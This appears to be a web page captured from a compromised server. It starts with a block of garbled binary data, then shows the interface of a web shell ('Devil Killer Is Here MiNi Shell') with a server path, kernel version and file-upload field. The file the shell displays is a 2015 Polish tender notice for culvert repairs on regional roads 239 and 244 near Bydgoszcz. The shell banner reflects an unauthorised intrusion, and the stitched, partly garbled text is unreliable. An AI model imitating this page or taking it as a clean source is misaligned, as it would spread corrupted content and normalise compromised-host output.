JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151012/268968-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Część nr 1-Naprawa przepustów w ciągu drogi nr 239 w km 16+108  oraz 16+302.
Część nr 2- Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680.</b><br>
<b>Numer ogłoszenia: 268968 - 2015; data zamieszczenia: 12.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część nr 1-Naprawa przepustów w ciągu drogi nr 239 w km 16+108  oraz 16+302.
Część nr 2- Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Nazwa zamówienia: 
Część nr 1- Naprawa przepustów w ciągu drogi nr 239 w km 16+108  oraz 16+302.
Część nr 2 -Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680.

WSPÓLNY SŁOWNIK ZAMÓWIEŃ

CPV 45.22.11.11-3 Roboty budowlane w zakresie budowy mostów

2. Zakres robót objętych zamówieniem
2.1. Dla części nr 1:
Przedmiot zamówienia: Naprawa przepustów w ciągu drogi nr 239 w km 16+108       oraz 16+302.

 2.1.1.Zamówienie obejmuje następujący zakres robót:
1)Przepust dwururowy w km 16+108
-Ręczne ścinanie i karczowanie krzaków i podszycia - rzadkie
-Roboty ziemne ręczne z transportem urobku na odległość do 1 km - grunt kat. III
-Rozebranie ścian z kamienia o gr. ponad 30 do 40 cm na zaprawie cementowej
-Czyszczenie ręczne przy użyciu narzędzi ręcznych konstrukcji z kamienia
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Ręczna rozbiórka konstrukcji betonowych o gr. do 20 cm
-Uzupełnienie ścian z kamienia na zaprawie cementowej o gr. ścian do 30 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - ławy i stopy
-Spoinowanie ścian z kamieni
-Ułożenie ścieków drogowych korytkowych o gr. 15 cm na podsypce cementowo - piaskowej
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Bariery ochronne stalowe mostowe z pochwytem AH2 W1, wysokości 1,2 m
-Zakończenia barier stalowych ochronnych jednostronnych
2)Przepust w km 16+302
-Roboty ziemne ręczne z transportem urobku taczkami na odległość do 10 m - grunt kat. III
-Ręczna rozbiórka konstrukcji betonowych o gr. do 20 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - belek, podciągów  i wieńców
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm  z zagęszczeniem
-Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów w gruncie IV.

2.2. Dla części nr 2:
Przedmiot zamówienia: Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680
 2.2.1.Zamówienie obejmuje następujący zakres robót: 
1)Przepust w km 7+809
-Ręczne ścinanie i karczowanie krzaków i podszycia - rzadkie
-Roboty ziemne ręczne z transportem urobku na odległość do 1 km - grunt kat. III
-Rozebranie ścian żelbetowych o grubości do 30 cm z transportem gruzu na odległość do 10 km
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości  średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Rozplantowanie urobku po odmuleniu rowu o gr. ponad 30 do 40 cm 
-Ręczna częściowa rozbiórka konstrukcji betonowych o gr. do 40 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - ławy i stopy
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm  z zagęszczeniem
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Wykonanie warstwy odsączającej z zagęszczeniem o gr. 10 cm
-Ustawienie obrzeży betonowych 8x30x100 na podsypce cementowo - piaskowej
-Ułożenie nawierzchni chodnika z kostki betonowej szarej o gr. 6 cm na podsypce ce - piaskowej
-Montaż barier ochronnych rurowych
2)Przepust w km 8+680
-Roboty ziemne ręczne z transportem urobku taczkami na odległość do 10 m - grunt kat. III
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Rozplantowanie urobku po odmuleniu rowu o gr. ponad 30 do 40 cm 
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - belek, podciągów i wieńców
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm z zagęszczeniem
-Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów w gruncie IV.
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Wykonanie warstwy odsączającej z zagęszczeniem o gr. 10 cm
-Ustawienie obrzeży betonowych 8x30x100 na podsypce cementowo - piaskowej
-Ułożenie nawierzchni chodnika z kostki betonowej o gr. 6 cm na podsypce cem. - piaskowej
-Montaż barier ochronnych rurowych

3. Szczegółowy zakres i warunki wykonania robót określają:  kosztorys ofertowy, przedmiar robót oraz dokumentacja SST.
4. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego  kołowego i pieszego w rejonie prowadzonych robót objętych umową na podstawie projektu tymczasowej organizacji ruchu (na czas prowadzonych robót) przekazanego przez Zamawiającego w dniu zawarciu umowy. 
5. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji przedmiotu zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
6. Zamawiający informuje, że materiały z rozbiórek nie nadające się do ponownego wykorzystania są własnością Wykonawcy. Rodzaj materiałów oraz ich ilości nie nadające się do ponownego wbudowania określi w trakcie realizacji zamówienia inspektor nadzoru..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia.
Warunkiem udzielenia zamówień uzupełniających jest posiadanie środków finansowych na ich wykonanie. Na okoliczność wystąpienia zamówień uzupełniających, zostanie zawarta umowa w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. Zamawiający dokona spełnienia oceny warunku udziału  w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. VI A ppkt.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu spełnienia warunku musi wykazać, że wykonał należycie, zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej  jedno zamówienie  obejmujące budowę, przebudowę, remont  przepustu, o wartości zamówienia nie mniejszej niż  30 000 zł  brutto (dla części nr 1) i 20 000 zł brutto (dla części nr 2),  w ostatnich 5 latach przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. Zamawiający dokona spełnienia oceny warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt.VI A ppkt. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia tj.: 
Kierownikiem budowy  - co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności  - dla każdej z części.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. Zamawiający dokona spełnienia oceny warunku udziału w postępowaniu w tym zakresie                 na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt.VI A ppkt. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy załączyć
1.Wypełniony i podpisany FORMULARZ OFERTY zawierający w szczególności cenę ofertową za przedmiot zamówienia oraz wykaz dotyczący podwykonawstwa wg załącznika nr 1.1. i 1.2. do SIWZ;
2.Wypełniony i podpisany KOSZTORYS OFERTOWY wg załącznika nr 2.1 i 2.2. do SIWZ; 
3. W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo  (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) o ile nie wynika ono z innych dokumentów dołączonych do oferty;
4. Do oferty wspólnej winien być dołączony dokument wskazujący pełnomocnika do reprezentowania wykonawców w postępowaniu albo do reprezentowania wykonawców w postępowaniu i podpisania mowy. Pełnomocnictwo musi być podpisane przez pozostałych wykonawców;
5. Oryginalne lub notarialnie podpisane ZOBOWIĄZANIE innego podmiotu, a w przypadku
podmiotów trzecich biorących udział w części realizacji zamówienia dokument potwierdzający
udział podmiotu w realizacji zamówienia - jeśli występuje (Załącznik nr 9 do SIWZ - opcjonalnie);
6. W przypadku zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa - wykazanie, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja na wykonanie robót - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na       warunkach określonych we wzorze Istotnych Postanowień Umowy będącej              załącznikiem nr 10 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu oferty.
2. Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej  w  postaci  aneksu  podpisanego  przez  obie  strony dotyczących w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1. Zmiana terminu realizacji zamówienia w przypadku: 
a) warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonanie przedmiotu zamówienia zgodnie z SST,
b) zlecanie przez Zamawiającego prac dodatkowych jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, 
c) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy,
d)wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji.
2.2.Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę 
podwykonawcy, wprowadzenie nowego podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków  w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie, 
2.3.Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których 
nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy  np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie 
obowiązywania umowy.
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana 
pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, 
gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji 
i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy,
2.4.Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy,
2.5.Zmiany wynagrodzenia w przypadku:
a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
b) konieczności wykonania robót niewykraczających swym zakresem poza przedmiot umowy, których ilość jednostek przedmiarowych wskazana przez Zamawiającego w przedmiarze robót została zaniżona - w odniesieniu do faktycznej ilości jednostek przedmiarowych, którą należy wykonać celem zrealizowania i oddania do użytkowania przedmiot umowy,
c) wystąpienia zamówienia uzupełniającego stanowiącego nie więcej niż 50% zamówienia podstawowego za zgodą Zamawiającego i na warunkach określonych w pkt XXII SIWZ.
3.Zmiany uzasadnione okolicznościami, o których mowa wart. 357 1 k.c. - Jeżeli  powodu 
nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone  z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia 
społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.
4.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
5. Natomiast nie stanowi zmiany umowy w rozumieniu art. 144 ustawy PZP: 
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana  rachunku bankowego); 
b) zmiana danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon  Dróg Wojewódzkich w Żołędowie ul. Pałacowa 15, 86-031 Osielsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2015 godzina 09:45, miejsce: Rejon Dróg Wojewódzkich w Żołędowie ul. Pałacowa 15, 86-031 Osielsko - sekretariat.
2. Termin składania ofert upływa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Punkty przyznawane za  kryteria będą liczone według następujących wzorów:

1.Pc =  Oferta z najniższą ceną : Oferta oceniana X 90 pkt      
      
